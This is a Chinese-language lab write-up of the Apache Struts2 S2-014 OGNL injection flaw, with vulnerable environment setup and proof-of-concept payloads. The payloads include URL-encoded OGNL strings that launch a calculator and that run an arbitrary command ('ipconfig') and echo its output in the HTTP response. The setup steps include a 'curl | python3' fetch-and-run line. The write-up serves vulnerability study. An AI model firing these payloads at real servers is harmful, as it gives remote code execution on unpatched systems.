Struts-S2-014漏洞利用(含环境搭建、含POC)
struts-s2-014
此文仅供大家交流学习,严禁非法使用
一、参考网址:
http://struts.apache.org/docs/s2-014.html
https://github.com/phith0n/vulhub/tree/master/struts2/s2-013
二、 影响版本:
S2-014 是对 S2-013 修复的加强,在 S2-013 修复的代码中忽略了 ${ognl_exp} OGNL 表达式执行的方式,因此 S2-014 是对其的补丁加强。
三、 漏洞介绍:
无论是S:URL和S:一个标签提供includeParams属性。
该属性的主要范围是了解是否包括http请求参数。
includeParams的允许值为:
无 - 在URL中不包含参数(默认)
get - 仅在URL中包含GET参数
all - 在URL中包含GET和POST参数
包含特制请求参数的请求可用于将任意OGNL代码注入到堆栈中,之后用作URL或A标签的请求参数,这将进一步评估。
当URL / A标签尝试解析原始请求中存在的每个参数时,会发生第二个评估。
这使得恶意用户将任意的OGNL语句放入任何请求参数(不一定由代码管理),并将其评估为OGNL表达式,以启用方法执行并执行任意方法,绕过Struts和OGNL库保护。
这个问题最初由Struts 2.3.14.1和安全公告S2-013处理。然而,2.3.14.1引入的解决方案没有解决所有可能的攻击向量,因此2.3.14.2之前的每个版本的Struts 2仍然容易受到这种攻击。
此漏洞相对于S2-013来说,前者参数必须为后台代码指定参数,但后者为任意参数,大大增强了漏洞被攻破的可能性
四、 环境搭建:
(windows)
- 下载/struts/2.1.6
下载地址:http://archive.apache.org/dist/struts/binaries/struts-2.1.6-apps.zip
-
下载安装xampp
-
部署showcase
-
解压
2.1.6_2.png
- 复制到.
- 重启tomcat
- 已成功自动部署
- 修改配置
在Struts Blank应用程序中打开HelloWorld.jsp,并将以下参数添加到url / a标签之一:
includeParams="all"
这样一来,这条线将会是这样的:
<s:url id="url" action="HelloWorld" includeParams="all">
运行struts2-blank应用程序
环境搭建:(ubuntu)
curl -s https://bootstrap.pypa.io/get-pip.py | python3
-
安装docker
apt-get update && apt-get install docker.io -
启动docker服务
service docker start -
安装compose
pip install docker-compose
注意要先ssh连接,将公钥添加到github上,具体参照网上教程
-
拉取项目
git clone git@github.com:phith0n/vulhub.git
cd vulhub -
进入某一个漏洞/环境的目录
cd nginx_php5_mysql -
自动化编译环境
docker-compose build -
启动整个环境
docker-compose up -d
五、 POC:
aaa=1${%23_memberAccess[%22allowStaticMethodAccess%22]=true,@java.lang.Runtime@getRuntime().exec('calc')}
六、 测试网址:
原始网址:
http://ip:8080/struts2-blank-2.1.6/example/HelloWorld.action
修改后网址;
http://ip:8080/struts2-blank-2.1.6/example/HelloWorld.action?url=1${%23_memberAccess[%22allowStaticMethodAccess%22]=true,@java.lang.Runtime@getRuntime().exec('calc')}
执行结果为打开本地计算器应用
任意可执行命令POC:
aaaa=1${%23_memberAccess[%22allowStaticMethodAccess%22]=true,%23cmd="ipconfig",%23ret=@java.lang.Runtime@getRuntime().exec(%23cmd),%23data=new+java.io.DataInputStream(%23ret.getInputStream()),%23res=new+byte[500],%23data.readFully(%23res),%23echo=new+java.lang.String(%23res),%23out=@org.apache.struts2.ServletActionContext@getResponse(),%23out.getWriter().println(%23echo)%7D
七、执行结果
1.png注意根据需求更改res大小
八、 至此,该漏洞基本利用完毕
本人还是一个未毕业的小萌新,希望大家多多帮助,有问题请发送邮件到xrzsupupup@163.com不胜感激,我也会尽量去帮助大家
坚决做一名白帽子